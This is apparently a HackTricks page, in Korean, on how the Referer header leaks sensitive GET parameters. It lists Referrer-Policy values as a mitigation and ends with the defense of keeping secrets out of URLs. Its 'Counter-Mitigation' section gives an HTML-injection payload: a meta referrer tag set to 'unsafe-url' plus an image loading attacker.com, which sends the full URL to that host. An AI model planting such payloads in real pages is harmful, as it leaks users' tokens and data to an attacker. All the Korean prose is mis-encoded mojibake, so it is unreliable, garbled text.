Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ

Referrer headers and policy

Referrer๋Š” ๋ธŒ๋ผ์šฐ์ €๊ฐ€ ์ด์ „์— ๋ฐฉ๋ฌธํ•œ ํŽ˜์ด์ง€๋ฅผ ๋‚˜ํƒ€๋‚ด๊ธฐ ์œ„ํ•ด ์‚ฌ์šฉํ•˜๋Š” ํ—ค๋”์ž…๋‹ˆ๋‹ค.

Sensitive information leaked

์›น ํŽ˜์ด์ง€ ๋‚ด์—์„œ GET ์š”์ฒญ ๋งค๊ฐœ๋ณ€์ˆ˜์— ๋ฏผ๊ฐํ•œ ์ •๋ณด๊ฐ€ ํฌํ•จ๋˜์–ด ์žˆ๋Š” ๊ฒฝ์šฐ, ํŽ˜์ด์ง€์— ์™ธ๋ถ€ ์†Œ์Šค์— ๋Œ€ํ•œ ๋งํฌ๊ฐ€ ํฌํ•จ๋˜์–ด ์žˆ๊ฑฐ๋‚˜ ๊ณต๊ฒฉ์ž๊ฐ€ ์‚ฌ์šฉ์ž๊ฐ€ ๊ณต๊ฒฉ์ž๊ฐ€ ์ œ์–ดํ•˜๋Š” URL์„ ๋ฐฉ๋ฌธํ•˜๋„๋ก ๋งŒ๋“ค๊ฑฐ๋‚˜ ์ œ์•ˆํ•  ์ˆ˜ ์žˆ๋Š” ๊ฒฝ์šฐ(์‚ฌํšŒ ๊ณตํ•™). ์ด ๊ฒฝ์šฐ ์ตœ์‹  GET ์š”์ฒญ ๋‚ด์˜ ๋ฏผ๊ฐํ•œ ์ •๋ณด๋ฅผ ์œ ์ถœํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

Mitigation

๋ธŒ๋ผ์šฐ์ €๊ฐ€ ๋ฏผ๊ฐํ•œ ์ •๋ณด๊ฐ€ ๋‹ค๋ฅธ ์›น ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์œผ๋กœ ์ „์†ก๋˜๋Š” ๊ฒƒ์„ ํ”ผํ•  ์ˆ˜ ์žˆ๋Š” Referrer-policy๋ฅผ ๋”ฐ๋ฅด๋„๋ก ์„ค์ •ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค:

Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url

Counter-Mitigation

์ด ๊ทœ์น™์€ HTML ๋ฉ”ํƒ€ ํƒœ๊ทธ๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ๋ฌด์‹œํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค(๊ณต๊ฒฉ์ž๋Š” HTML ์ฃผ์ž…์„ ์ด์šฉํ•ด์•ผ ํ•จ):

<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">

Defense

์ ˆ๋Œ€ GET ๋งค๊ฐœ๋ณ€์ˆ˜๋‚˜ URL ๊ฒฝ๋กœ์— ๋ฏผ๊ฐํ•œ ๋ฐ์ดํ„ฐ๋ฅผ ๋„ฃ์ง€ ๋งˆ์‹ญ์‹œ์˜ค.

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ